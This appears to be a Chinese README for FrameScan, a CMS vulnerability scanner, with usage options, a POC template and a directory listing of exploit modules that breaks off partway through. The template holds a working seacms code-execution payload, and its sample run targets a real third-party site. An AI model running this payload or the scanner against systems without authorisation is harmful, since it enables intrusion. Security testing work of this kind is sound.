目录导航
工具简介
FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。
支持平台
- Windows
- Linux
- MAC (请自测)
工具特点
- 单URL批量检测
- 单URL单漏洞检测
- 单URL指定CMS检测
- 多URL单漏洞检测
- 单URL单漏洞检测
- 单URL指定CMS检测
Gui版本
下载地址
①GitHub:
https://github.com/qianxiao996/FrameScan-GUI
FrameScan-GUI-V1.2.6.zip
②雨苁网盘 w.ddosi.workers.dev
详细参数
-u Url URL地址
-f Load urls file 文件路径
-m Use poc module 使用单个POC
-c Specify CMS 指定CMS类型
-s Search poc keywords 查找关键词漏洞
-lc List CMS POC 列出指定CMS漏洞
-l List avalible pocs 列出所有POC
-r Reload POC 重新加载POC
-txt Save Result(txt) 输出扫描结果(txt)
-html Save Result(html) 输出扫描结果(html)
-h Get help 帮助信息
使用方法
①下载项目:
下载地址①: GitHub
下载地址②: 雨苁网盘 w.ddosi.workers.dev
git clone https://github.com/qianxiao996/FrameScan
②安装依赖(不需要!)
脚本主要依赖于以下模块(无需安装)
import sys,os,re
from color import *
import sqlite3,requests③运行脚本
>python3 FrameScan.py
_____ ____
| ___| __ __ _ _ __ ___ ___/ ___| ___ __ _ _ __
| |_ | '__/ _` | '_ ` _ \ / _ \___ \ / __/ _` | '_ \
| _|| | | (_| | | | | | | __/___) | (_| (_| | | | |
|_| |_| \__,_|_| |_| |_|\___|____/ \___\__,_|_| |_|
Options: Code by qianxiao996
-----------------------------------------------------
-u Url URL地址
-f Load urls file 文件路径
-m Use poc module 使用单个POC
-c Specify CMS 指定CMS类型
-s Search poc keywords 查找关键词漏洞
-lc List CMS POC 列出指定CMS漏洞
-l List avalible pocs 列出所有POC
-r Reload POC 重新加载POC
-txt Save Result(txt) 输出扫描结果(txt)
-html Save Result(html) 输出扫描结果(html)
-h Get help 帮助信息
-----------------------------------------------------
FrameScan V1.1 Blog:blog.qianxiao996.cn
④单URL批量检测
python3 FrameScan.py -u URL
⑤单URL单漏洞检测(POC_METHOS可以用 -l、-s、-lc进行查询)
python3 FrameScan.py -u URL -m POC_METHOS
⑥单URL指定CMS检测
python3 FrameScan.py -u URL -m POC_METHOS
⑦多URL批量检测
python3 FrameScan.py -f 文件名
⑧多URL单漏洞检测
python3 FrameScan.py -f 文件名 -m POC_METHOS
⑨多URL指定CMS检测
python3 FrameScan.py -f 文件名 -c CMS类型
⑩输出到TXT或者HTML文件
python3 FrameScan.py -u URL -txt 文件名
python3 FrameScan.py -u URL -html 文件名
文件名 -c CMS类型
自定义POC模板
代码中采用自定义彩色输出,请尽量规范编写。脚本中为示例代码。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 漏洞名称(禁止换行)控制在30字以内
referer: 漏洞地址(禁止换行)未知请填unknown
author: 作者名
description: 漏洞描述
'''
import sys
import requests
import warnings
def run(url):
#此处编辑检测代码
#示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
result = ['seacms v6.5.5代码执行漏洞','','']
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
url_path = url + "/search.php?phpinfo();"
try:
data = requests.get(url_path, timeout=3,headers=headers, verify=False)
if data.status_code == 200 and 'phpinfo' in data.text:
result[2]= "存在"
result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
else:
result[2] = "不存在"
except Exception as e:
# print (e)
result[2] ="不存在"
#这里可设置未知,连接超时等,只有不存在不会显示到结果中。
return result
#最后一定要返回一个带有3个参数的列表。不然会出错误。
if __name__ == "__main__":
#此处不会调用
warnings.filterwarnings("ignore")
testVuln = run("http://baidu.com")
print(testVuln)
工具poc列表
├─acsoft
│ │ GetFileContent_fileread.py
│ │ GetFile_fileread.py
│ │ GetXMLList_fileread.py
│ │
│ └─__pycache__
│ acsoft_GetFileContent_fileread.cpython-37.pyc
│ acsoft_GetFile_fileread.cpython-37.pyc
│ acsoft_GetXMLList_fileread.cpython-37.pyc
│ GetFileContent_fileread.cpython-37.pyc
│ GetFile_fileread.cpython-37.pyc
│ GetXMLList_fileread.cpython-37.pyc
│
├─autoset
│ │ phpmyadmin_unauth.py
│ │
│ └─__pycache__
│ autoset_phpmyadmin_unauth.cpython-37.pyc
│ phpmyadmin_unauth.cpython-37.pyc
│
├─bash
│ │ shellshock.py
│ │
│ └─__pycache__
│ shellshock.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─cmseasy
│ │ header_detail_sqli.py
│ │
│ └─__pycache__
│ cmseasy_header_detail_sqli.cpython-37.pyc
│ header_detail_sqli.cpython-37.pyc
│
├─couchdb
│ │ unauth.py
│ │
│ └─__pycache__
│ couchdb_unauth.cpython-37.pyc
│ unauth.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─dedecms
│ │ download_redirect.py
│ │ error_trace_disclosure.py
│ │ information.py
│ │ recommend_sqli.py
│ │ search_typeArr_sqli.py
│ │ version.py
│ │
│ └─__pycache__
│ dedecms_download_redirect.cpython-37.pyc
│ dedecms_error_trace_disclosure.cpython-37.pyc
│ dedecms_recommend_sqli.cpython-37.pyc
│ dedecms_search_typeArr_sqli.cpython-37.pyc
│ dedecms_version.cpython-37.pyc
│ download_redirect.cpython-37.pyc
│ error_trace_disclosure.cpython-37.pyc
│ information.cpython-37.pyc
│ recommend_sqli.cpython-37.pyc
│ search_typeArr_sqli.cpython-37.pyc
│ version.cpython-37.pyc
│
├─discuz
│ │ focus_flashxss.py
│ │ forum_message_ssrf.py
│ │ plugin_ques_sqli.py
│ │ x25_path_disclosure.py
│ │
│ └─__pycache__
│ discuz_focus_flashxss.cpython-37.pyc
│ discuz_forum_message_ssrf.cpython-37.pyc
│ discuz_plugin_ques_sqli.cpython-37.pyc
│ discuz_x25_path_disclosure.cpython-37.pyc
│ focus_flashxss.cpython-37.pyc
│ forum_message_ssrf.cpython-37.pyc
│ plugin_ques_sqli.cpython-37.pyc
│ x25_path_disclosure.cpython-37.pyc
│
├─diyou
│ │ latesindex_sqli.py
│ │ url_fileread.py
│ │
│ └─__pycache__
│ dyp2p_latesindex_sqli.cpython-37.pyc
│ dyp2p_url_fileread.cpython-37.pyc
│ latesindex_sqli.cpython-37.pyc
│ url_fileread.cpython-37.pyc
│
├─dorado
│ │ default_passwd.py
│ │
│ └─__pycache__
│ default_passwd.cpython-37.pyc
│ dorado_default_passwd.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─dreamgallery
│ │ album_id_sqli.py
│ │
│ └─__pycache__
│ album_id_sqli.cpython-37.pyc
│ dreamgallery_album_id_sqli.cpython-37.pyc
│
├─dswjcms
│ │ p2p_multi_sqli.py
│ │
│ └─__pycache__
│ dswjcms_p2p_multi_sqli.cpython-37.pyc
│ p2p_multi_sqli.cpython-37.pyc
│
├─ecscms
│ │ MoreIndex_sqli.py
│ │
│ └─__pycache__
│ ecscms_MoreIndex_sqli.cpython-37.pyc
│ MoreIndex_sqli.cpython-37.pyc
│
├─ecshop
│ │ eshop_all_code_exec.py
│ │ orderid_sqli.py
│ │ uc_code_sqli.py
│ │
│ └─__pycache__
│ ecshop_flow_orderid_sqli.cpython-37.pyc
│ ecshop_uc_code_sqli.cpython-37.pyc
│ eshop_all_code_exec.cpython-37.pyc
│ orderid_sqli.cpython-37.pyc
│ uc_code_sqli.cpython-37.pyc
│
├─esccms
│ │ selectunitmember_unauth.py
│ │
│ └─__pycache__
│ esccms_selectunitmember_unauth.cpython-37.pyc
│ selectunitmember_unauth.cpython-37.pyc
│
├─etmdcp
│ │ Load_filedownload.py
│ │
│ └─__pycache__
│ etmdcp_Load_filedownload.cpython-37.pyc
│ Load_filedownload.cpython-37.pyc
│
├─eyou
│ │ admin_id_sqli.py
│ │ resetpw.py
│ │ user_kw_sqli.py
│ │ weakpass.py
│ │
│ └─__pycache__
│ admin_id_sqli.cpython-37.pyc
│ eyou_admin_id_sqli.cpython-37.pyc
│ eyou_resetpw.cpython-37.pyc
│ eyou_user_kw_sqli.cpython-37.pyc
│ eyou_weakpass.cpython-37.pyc
│ resetpw.cpython-37.pyc
│ user_kw_sqli.cpython-37.pyc
│ weakpass.cpython-37.pyc
│
├─fastmeeting
│ │ download_filedownload.py
│ │
│ └─__pycache__
│ download_filedownload.cpython-37.pyc
│ fastmeeting_download_filedownload.cpython-37.pyc
│
├─finecms
│ │ uploadfile.py
│ │ v508_getshell.py
│ │ v508_write_file.py
│ │
│ └─__pycache__
│ finecms_508_getshell.cpython-37.pyc
│ finecms_508_write_file.cpython-37.pyc
│ finecms_uploadfile.cpython-37.pyc
│ uploadfile.cpython-37.pyc
│ v508_getshell.cpython-37.pyc
│ v508_write_file.cpython-37.pyc
│
├─foosun
│ │ City_ajax_sqli.py
│ │
│ └─__pycache__
│ City_ajax_sqli.cpython-37.pyc
│ foosun_City_ajax_sqli.cpython-37.pyc
│
├─fsmcms
│ │ columninfo_sqli.py
│ │ p_replydetail_sqli.py
│ │ setup_reinstall.py
│ │
│ └─__pycache__
│ columninfo_sqli.cpython-37.pyc
│ fsmcms_columninfo_sqli.cpython-37.pyc
│ fsmcms_p_replydetail_sqli.cpython-37.pyc
│ fsmcms_setup_reinstall.cpython-37.pyc
│ p_replydetail_sqli.cpython-37.pyc
│ setup_reinstall.cpython-37.pyc
│
├─glassfish
│ │ fileread.py
│ │
│ └─__pycache__
│ fileread.cpython-37.pyc
│ glassfish_fileread.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─goahead
│ │ LD_PRELOAD_rce.py
│ │
│ ├─bin
│ │ goahead_payload.so
│ │
│ └─__pycache__
│ goahead_LD_PRELOAD_rce.cpython-37.pyc
│ LD_PRELOAD_rce.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─gobetters
│ │ multi_sqli.py
│ │
│ └─__pycache__
│ gobetters_multi_sqli.cpython-37.pyc
│ multi_sqli.cpython-37.pyc
│
├─gowinsoft_jw
│ │ jw_multi_sqli.py
│ │
│ └─__pycache__
│ gowinsoft_jw_multi_sqli.cpython-37.pyc
│ jw_multi_sqli.cpython-37.pyc
│
├─gpower
│ │ users_disclosure.py
│ │
│ └─__pycache__
│ gpower_users_disclosure.cpython-37.pyc
│ users_disclosure.cpython-37.pyc
│
├─hanweb
│ │ downfile_filedownload.py
│ │ readxml_fileread.py
│ │ VerifyCodeServlet_install.py
│ │
│ └─__pycache__
│ downfile_filedownload.cpython-37.pyc
│ hanweb_downfile_filedownload.cpython-37.pyc
│ hanweb_readxml_fileread.cpython-37.pyc
│ hanweb_VerifyCodeServlet_install.cpython-37.pyc
│ readxml_fileread.cpython-37.pyc
│ VerifyCodeServlet_install.cpython-37.pyc
│
├─hfs
│ │ rejetto_search_rce.py
│ │
│ └─__pycache__
│ hfs_rejetto_search_rce.cpython-37.pyc
│ rejetto_search_rce.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─Hishop
│ │ productlist_sqli.py
│ │
│ └─__pycache__
│ hishop_productlist_sqli.cpython-37.pyc
│ productlist_sqli.cpython-37.pyc
│
├─HTTP_SYS
│ │ HTTP_SYS_EXEC.py
│ │
│ └─__pycache__
│ HTTP_SYS_EXEC.cpython-37.pyc
│
├─hudson
│ │ ws_disclosure.py
│ │
│ └─__pycache__
│ hudson_ws_disclosure.cpython-37.pyc
│ ws_disclosure.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─iGenus
│ │ code_exec.py
│ │ login_Lang_fileread.py
│ │ syslogin_Lang_fileread.py
│ │
│ └─__pycache__
│ code_exec.cpython-37.pyc
│ igenus_code_exec.cpython-37.pyc
│ igenus_login_Lang_fileread.cpython-37.pyc
│ igenus_syslogin_Lang_fileread.cpython-37.pyc
│ login_Lang_fileread.cpython-37.pyc
│ syslogin_Lang_fileread.cpython-37.pyc
│
├─iis
│ │ ms15034_httpsys_rce.py
│ │ webdav_rce.py
│ │
│ └─__pycache__
│ iis_ms15034_httpsys_rce.cpython-37.pyc
│ iis_webdav_rce.cpython-37.pyc
│ ms15034_httpsys_rce.cpython-37.pyc
│ webdav_rce.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─inspur
│ │ ecgap_displayNewsPic_sqli.py
│ │ multi_sqli.py
│ │
│ └─__pycache__
│ ecgap_displayNewsPic_sqli.cpython-37.pyc
│ inspur_ecgap_displayNewsPic_sqli.cpython-37.pyc
│ inspur_multi_sqli.cpython-37.pyc
│ multi_sqli.cpython-37.pyc
│
├─intel
│ │ amt_crypt_bypass.py
│ │
│ └─__pycache__
│ amt_crypt_bypass.cpython-37.pyc
│ intel_amt_crypt_bypass.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─iwms
│ │ bypass_js_delete.py
│ │
│ └─__pycache__
│ bypass_js_delete.cpython-37.pyc
│ iwms_bypass_js_delete.cpython-37.pyc
│
├─jeecg
│ │ pwd_reset.py
│ │
│ └─__pycache__
│ jeecg_pwd_reset.cpython-37.pyc
│ pwd_reset.cpython-37.pyc
│
├─jeecms
│ │ fpath_filedownload.py
│ │
│ └─__pycache__
│ fpath_filedownload.cpython-37.pyc
│ jeecms_fpath_filedownload.cpython-37.pyc
│
├─joomla
│ │ com_docman_lfi.py
│ │ index_list_sqli.py
│ │
│ └─__pycache__
│ com_docman_lfi.cpython-37.pyc
│ index_list_sqli.cpython-37.pyc
│ joomla_com_docman_lfi.cpython-37.pyc
│ joomla_index_list_sqli.cpython-37.pyc
│
├─jumboecms
│ │ slide_id_sqli.py
│ │
│ └─__pycache__
│ jumboecms_slide_id_sqli.cpython-37.pyc
│ slide_id_sqli.cpython-37.pyc
│
├─kingdee
│ │ conf_disclosure.py
│ │ filedownload.py
│ │ logoImgServlet_fileread.py
│ │ resin_dir_path_disclosure.py
│ │
│ └─__pycache__
│ conf_disclosure.cpython-37.pyc
│ filedownload.cpython-37.pyc
│ kingdee_conf_disclosure.cpython-37.pyc
│ kingdee_filedownload.cpython-37.pyc
│ kingdee_logoImgServlet_fileread.cpython-37.pyc
│ kingdee_resin_dir_path_disclosure.cpython-37.pyc
│ logoImgServlet_fileread.cpython-37.pyc
│ resin_dir_path_disclosure.cpython-37.pyc
│
├─kxmail
│ │ login_server_sqli.py
│ │
│ └─__pycache__
│ kxmail_login_server_sqli.cpython-37.pyc
│ login_server_sqli.cpython-37.pyc
│
├─lbcms
│ │ webwsfw_bssh_sqli.py
│ │
│ └─__pycache__
│ lbcms_webwsfw_bssh_sqli.cpython-37.pyc
│ webwsfw_bssh_sqli.cpython-37.pyc
│
├─libsys
│ │ ajax_asyn_link_fileread.py
│ │ ajax_asyn_link_old_fileread.py
│ │ ajax_get_file_fileread.py
│ │
│ └─__pycache__
│ ajax_asyn_link_fileread.cpython-37.pyc
│ ajax_asyn_link_old_fileread.cpython-37.pyc
│ ajax_get_file_fileread.cpython-37.pyc
│ libsys_ajax_asyn_link_fileread.cpython-37.pyc
│ libsys_ajax_asyn_link_old_fileread.cpython-37.pyc
│ libsys_ajax_get_file_fileread.cpython-37.pyc
│
├─live800
│ │ downlog_filedownload.py
│ │ fileDownloadServer_fileread.py
│ │ loginAction_sqli.py
│ │ sta_export_sqli.py
│ │
│ └─__pycache__
│ downlog_filedownload.cpython-37.pyc
│ fileDownloadServer_fileread.cpython-37.pyc
│ live800_downlog_filedownload.cpython-37.pyc
│ live800_fileDownloadServer_fileread.cpython-37.pyc
│ live800_loginAction_sqli.cpython-37.pyc
│ live800_services_xxe.cpython-37.pyc
│ live800_sta_export_sqli.cpython-37.pyc
│ loginAction_sqli.cpython-37.pyc
│ services_xxe.cpython-37.pyc
│ sta_export_sqli.cpython-37.pyc
│
├─looyu
│ │ down_filedownload.py
│ │
│ └─__pycache__
│ down_filedownload.cpython-37.pyc
│ looyu_down_filedownload.cpython-37.pyc
│
├─metinfo
│ │ getpassword_sqli.py
│ │ login_check_sqli.py
│ │
│ └─__pycache__
│ getpassword_sqli.cpython-37.pyc
│ login_check_sqli.cpython-37.pyc
│ metinfo_getpassword_sqli.cpython-37.pyc
│ metinfo_login_check_sqli.cpython-37.pyc
│
├─ndstar
│ │ six_sqli.py
│ │
│ └─__pycache__
│ ndstar_six_sqli.cpython-37.pyc
│ six_sqli.cpython-37.pyc
│
├─nitc
│ │ index_language_id_sqli.py
│ │ suggestwordList_sqli.py
│ │
│ └─__pycache__
│ index_language_id_sqli.cpython-37.pyc
│ nitc_index_language_id_sqli.cpython-37.pyc
│ nitc_suggestwordList_sqli.cpython-37.pyc
│ suggestwordList_sqli.cpython-37.pyc
│
├─opensns
│ │ index_arearank.py
│ │ index_getshell.py
│ │
│ └─__pycache__
│ index_arearank.cpython-37.pyc
│ index_getshell.cpython-37.pyc
│ opensns_index_arearank.cpython-37.pyc
│ opensns_index_getshell.cpython-37.pyc
│
├─others
│ │ alkawebs_viewnews_sqli.py
│ │ anmai_grghjl_stuNo_sqli.py
│ │ anmai_teachingtechnology_sqli.py
│ │ caitong_multi_sleep_sqli.py
│ │ caitong_multi_sqli.py
│ │ clib_kindaction_fileread.py
│ │ clib_kinweblistaction_download.py
│ │ damall_selloffer_sqli.py
│ │ dkcms_database_disclosure.py
│ │ domino_unauth.py
│ │ efuture_downloadAct_filedownload.py
│ │ eis_menu_left_edit_sqli.py
│ │ euse_study_multi_sqli.py
│ │ forease_fileinclude_code_exec.py
│ │ gevercms_downLoadFile_filedownload.py
│ │ gn_consulting_sqli.py
│ │ gpcsoft_ewebeditor_weak.py
│ │ gxwssb_fileDownloadmodel_download.py
│ │ haohan_FileDown_filedownload.py
│ │ hezhong_list_id_sqli.py
│ │ hjsoft_sqli.py
│ │ hnkj_researchinfo_dan_sqli.py
│ │ hongan_dlp_struts_exec.py
│ │ huaficms_bypass_js.py
│ │ ips_community_suite_code_exec.py
│ │ jiuyu_library_struts_exec.py
│ │ jxt1039_unauth.py
│ │ kj65n_monitor_sqli.py
│ │ lianbang_multi_bypass_priv.py
│ │ mainone_b2b_Default_sqli.py
│ │ mainone_ProductList_sqli.py
│ │ mainone_SupplyList_sqli.py
│ │ mallbuilder_change_status_sqli.py
│ │ mingteng_cookie_deception.py
│ │ newedos_multi_sqli.py
│ │ nongyou_Item2_sqli.py
│ │ nongyou_multi_sqli.py
│ │ nongyou_ShowLand_sqli.py
│ │ nongyou_sleep_sqli.py
│ │ rap_interface_struts_exec.py
│ │ shiyou_list_keyWords_sqli.py
│ │ sinda_downloadfile_download.py
│ │ skytech_bypass_priv.py
│ │ skytech_geren_list_page_sqli.py
│ │ star_PostSuggestion_sqli.py
│ │ suntown_upfile_fileupload.py
│ │ tianbo_Class_Info_sqli.py
│ │ tianbo_St_Info_sqli.py
│ │ tianbo_TCH_list_sqli.py
│ │ tianbo_Type_List_sqli.py
│ │ tpshop_eval_stdin_code_exec.py
│ │ workyi_multi_sqli.py
│ │ xtcms_download_filedownload.py
│ │ xuezi_ceping_unauth.py
│ │ yaojie_steel_struts_exec.py
│ │ yeu_disclosure_uid.py
│ │ zfcgxt_UserSecurityController_getpass.py
│ │ zf_cms_FileDownload.py
│ │ zhuofan_downLoadFile_download.py
│ │
│ └─__pycache__
│ alkawebs_viewnews_sqli.cpython-37.pyc
│ anmai_grghjl_stuNo_sqli.cpython-37.pyc
│ anmai_teachingtechnology_sqli.cpython-37.pyc
│ caitong_multi_sleep_sqli.cpython-37.pyc
│ caitong_multi_sqli.cpython-37.pyc
│ cicro_DownLoad_filedownload.cpython-37.pyc
│ clib_kindaction_fileread.cpython-37.pyc
│ clib_kinweblistaction_download.cpython-37.pyc
│ damall_selloffer_sqli.cpython-37.pyc
│ dkcms_database_disclosure.cpython-37.pyc
│ domino_unauth.cpython-37.pyc
│ efuture_downloadAct_filedownload.cpython-37.pyc
│ eis_menu_left_edit_sqli.cpython-37.pyc
│ euse_study_multi_sqli.cpython-37.pyc
│ forease_fileinclude_code_exec.cpython-37.pyc
│ gevercms_downLoadFile_filedownload.cpython-37.pyc
│ gn_consulting_sqli.cpython-37.pyc
│ gpcsoft_ewebeditor_weak.cpython-37.pyc
│ gxwssb_fileDownloadmodel_download.cpython-37.pyc
│ haohan_FileDown_filedownload.cpython-37.pyc
│ hezhong_list_id_sqli.cpython-37.pyc
│ hjsoft_sqli.cpython-37.pyc
│ hnkj_researchinfo_dan_sqli.cpython-37.pyc
│ hongan_dlp_struts_exec.cpython-37.pyc
│ huaficms_bypass_js.cpython-37.pyc
│ ips_community_suite_code_exec.cpython-37.pyc
│ jiuyu_library_struts_exec.cpython-37.pyc
│ jxt1039_unauth.cpython-37.pyc
│ kj65n_monitor_sqli.cpython-37.pyc
│ lianbang_multi_bypass_priv.cpython-37.pyc
│ mainone_b2b_Default_sqli.cpython-37.pyc
│ mainone_ProductList_sqli.cpython-37.pyc
│ mainone_SupplyList_sqli.cpython-37.pyc
│ mallbuilder_change_status_sqli.cpython-37.pyc
│ mingteng_cookie_deception.cpython-37.pyc
│ newedos_multi_sqli.cpython-37.pyc
│ nongyou_Item2_sqli.cpython-37.pyc
│ nongyou_multi_sqli.cpython-37.pyc
│ nongyou_ShowLand_sqli.cpython-37.pyc
│ nongyou_sleep_sqli.cpython-37.pyc
│ rap_interface_struts_exec.cpython-37.pyc
│ shiyou_list_keyWords_sqli.cpython-37.pyc
│ sinda_downloadfile_download.cpython-37.pyc
│ skytech_bypass_priv.cpython-37.pyc
│ skytech_geren_list_page_sqli.cpython-37.pyc
│ star_PostSuggestion_sqli.cpython-37.pyc
│ suntown_upfile_fileupload.cpython-37.pyc
│ tianbo_Class_Info_sqli.cpython-37.pyc
│ tianbo_St_Info_sqli.cpython-37.pyc
│ tianbo_TCH_list_sqli.cpython-37.pyc
│ tianbo_Type_List_sqli.cpython-37.pyc
│ tpshop_eval_stdin_code_exec.cpython-37.pyc
│ workyi_multi_sqli.cpython-37.pyc
│ xtcms_download_filedownload.cpython-37.pyc
│ xuezi_ceping_unauth.cpython-37.pyc
│ yaojie_steel_struts_exec.cpython-37.pyc
│ yeu_disclosure_uid.cpython-37.pyc
│ zfcgxt_UserSecurityController_getpass.cpython-37.pyc
│ zf_cms_FileDownload.cpython-37.pyc
│ zhuofan_downLoadFile_download.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─pageadmin
│ │ forge_viewstate.py
│ │
│ └─__pycache__
│ forge_viewstate.cpython-37.pyc
│ pageadmin_forge_viewstate.cpython-37.pyc
│
├─php
│ │ expose_disclosure.py
│ │ fastcgi_read.py
│ │
│ └─__pycache__
│ expose_disclosure.cpython-37.pyc
│ fastcgi_read.cpython-37.pyc
│ php_expose_disclosure.cpython-37.pyc
│ php_fastcgi_read.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─php168
│ │ login_getshell.py
│ │
│ └─__pycache__
│ login_getshell.cpython-37.pyc
│ php168_login_getshell.cpython-37.pyc
│
├─phpcms
│ │ authkey_disclosure.py
│ │ digg_add_sqli.py
│ │ flash_upload_sqli.py
│ │ product_code_exec.py
│ │ v961_fileread.py
│ │ v96_sqli.py
│ │ v9_flash_xss.py
│ │
│ └─__pycache__
│ authkey_disclosure.cpython-37.pyc
│ digg_add_sqli.cpython-37.pyc
│ flash_upload_sqli.cpython-37.pyc
│ phpcms_authkey_disclosure.cpython-37.pyc
│ phpcms_digg_add_sqli.cpython-37.pyc
│ phpcms_flash_upload_sqli.cpython-37.pyc
│ phpcms_product_code_exec.cpython-37.pyc
│ phpcms_v961_fileread.cpython-37.pyc
│ phpcms_v96_sqli.cpython-37.pyc
│ phpcms_v9_flash_xss.cpython-37.pyc
│ product_code_exec.cpython-37.pyc
│ v961_fileread.cpython-37.pyc
│ v96_sqli.cpython-37.pyc
│ v9_flash_xss.cpython-37.pyc
│
├─phpmyadmin
│ │ setup_lfi.py
│ │
│ └─__pycache__
│ phpmyadmin_setup_lfi.cpython-37.pyc
│ setup_lfi.cpython-37.pyc
│
├─phpok
│ │ api_param_sqli.py
│ │ remote_image_getshell.py
│ │ res_action_control_filedownload.py
│ │
│ └─__pycache__
│ api_param_sqli.cpython-37.pyc
│ phpok_api_param_sqli.cpython-37.pyc
│ phpok_remote_image_getshell.cpython-37.pyc
│ phpok_res_action_control_filedownload.cpython-37.pyc
│ remote_image_getshell.cpython-37.pyc
│ res_action_control_filedownload.cpython-37.pyc
│
├─phpstudy
│ │ phpmyadmin_defaultpwd.py
│ │ phpstudy_backdoor.py
│ │ probe.py
│ │
│ └─__pycache__
│ phpmyadmin_defaultpwd.cpython-37.pyc
│ phpstudy_backdoor.cpython-37.pyc
│ phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc
│ phpstudy_probe.cpython-37.pyc
│ probe.cpython-37.pyc
│
├─piaoyou
│ │ int_order_sqli.py
│ │ multi_sqli.py
│ │ newsview_list.py
│ │ six2_sqli.py
│ │ six_sqli.py
│ │ ten_sqli.py
│ │
│ └─__pycache__
│ int_order_sqli.cpython-37.pyc
│ multi_sqli.cpython-37.pyc
│ newsview_list.cpython-37.pyc
│ piaoyou_int_order_sqli.cpython-37.pyc
│ piaoyou_multi_sqli.cpython-37.pyc
│ piaoyou_newsview_list.cpython-37.pyc
│ piaoyou_six2_sqli.cpython-37.pyc
│ piaoyou_six_sqli.cpython-37.pyc
│ piaoyou_ten_sqli.cpython-37.pyc
│ six2_sqli.cpython-37.pyc
│ six_sqli.cpython-37.pyc
│ ten_sqli.cpython-37.pyc
│
├─PKPMBS
│ │ addresslist_keyword_sqli.py
│ │ guestbook_sqli.py
│ │ MsgList_sqli.py
│ │
│ └─__pycache__
│ addresslist_keyword_sqli.cpython-37.pyc
│ guestbook_sqli.cpython-37.pyc
│ MsgList_sqli.cpython-37.pyc
│ pkpmbs_addresslist_keyword_sqli.cpython-37.pyc
│ pkpmbs_guestbook_sqli.cpython-37.pyc
│ pkpmbs_MsgList_sqli.cpython-37.pyc
│
├─pstar
│ │ isfLclInfo_sqli.py
│ │ qcustoms_sqli.py
│ │ warehouse_msg_01_sqli.py
│ │
│ └─__pycache__
│ isfLclInfo_sqli.cpython-37.pyc
│ pstar_isfLclInfo_sqli.cpython-37.pyc
│ pstar_qcustoms_sqli.cpython-37.pyc
│ pstar_warehouse_msg_01_sqli.cpython-37.pyc
│ qcustoms_sqli.cpython-37.pyc
│ warehouse_msg_01_sqli.cpython-37.pyc
│
├─qibocms
│ │ js_f_id_sqli.py
│ │ search_code_exec.py
│ │ search_sqli.py
│ │ s_fids_sqli.py
│ │
│ └─__pycache__
│ js_f_id_sqli.cpython-37.pyc
│ qibocms_js_f_id_sqli.cpython-37.pyc
│ qibocms_search_code_exec.cpython-37.pyc
│ qibocms_search_sqli.cpython-37.pyc
│ qibocms_s_fids_sqli.cpython-37.pyc
│ search_code_exec.cpython-37.pyc
│ search_sqli.cpython-37.pyc
│ s_fids_sqli.cpython-37.pyc
│
├─resin
│ │ viewfile_fileread.py
│ │
│ └─__pycache__
│ resin_viewfile_fileread.cpython-37.pyc
│ viewfile_fileread.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─ruvar
│ │ multi_sqli.py
│ │ multi_sqli2.py
│ │ multi_sqli3.py
│ │
│ └─__pycache__
│ multi_sqli.cpython-37.pyc
│ multi_sqli2.cpython-37.pyc
│ multi_sqli3.cpython-37.pyc
│ ruvar_oa_multi_sqli.cpython-37.pyc
│ ruvar_oa_multi_sqli2.cpython-37.pyc
│ ruvar_oa_multi_sqli3.cpython-37.pyc
│
├─sangfor
│ │ ad_script_command_exec.py
│ │
│ └─__pycache__
│ ad_script_command_exec.cpython-37.pyc
│ sangfor_ad_script_command_exec.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─seacms
│ │ order_code_exec.py
│ │ search_code_exec.py
│ │ search_jq_code_exec.py
│ │ v655_code_exec.py
│ │
│ └─__pycache__
│ order_code_exec.cpython-37.pyc
│ seacms_655_code_exec.cpython-37.pyc
│ seacms_backstage_getshell.cpython-37.pyc
│ seacms_order_code_exec.cpython-37.pyc
│ seacms_search_code_exec.cpython-37.pyc
│ seacms_search_jq_code_exec.cpython-37.pyc
│ search_code_exec.cpython-37.pyc
│ search_jq_code_exec.cpython-37.pyc
│ v655_code_exec.cpython-37.pyc
│
├─shadowsit
│ │ selector_lfi.py
│ │
│ └─__pycache__
│ selector_lfi.cpython-37.pyc
│ shadowsit_selector_lfi.cpython-37.pyc
│
├─shop360
│ │ do_filedownload.py
│ │
│ └─__pycache__
│ do_filedownload.cpython-37.pyc
│ shop360_do_filedownload.cpython-37.pyc
│
├─shop7z
│ │ order_checknoprint_sqli.py
│ │
│ └─__pycache__
│ order_checknoprint_sqli.cpython-37.pyc
│ shop7z_order_checknoprint_sqli.cpython-37.pyc
│
├─shopex
│ │ phpinfo_disclosure.py
│ │
│ └─__pycache__
│ phpinfo_disclosure.cpython-37.pyc
│ shopex_phpinfo_disclosure.cpython-37.pyc
│
├─shopnc
│ │ index_class_id_sqli.py
│ │
│ └─__pycache__
│ index_class_id_sqli.cpython-37.pyc
│ shopnc_index_class_id_sqli.cpython-37.pyc
│
├─shopnum
│ │ GuidBuyList_sqli.py
│ │ ProductDetail_sqli.py
│ │ ProductListCategory_sqli.py
│ │ ShoppingCart1_sqli.py
│ │
│ └─__pycache__
│ GuidBuyList_sqli.cpython-37.pyc
│ ProductDetail_sqli.cpython-37.pyc
│ ProductListCategory_sqli.cpython-37.pyc
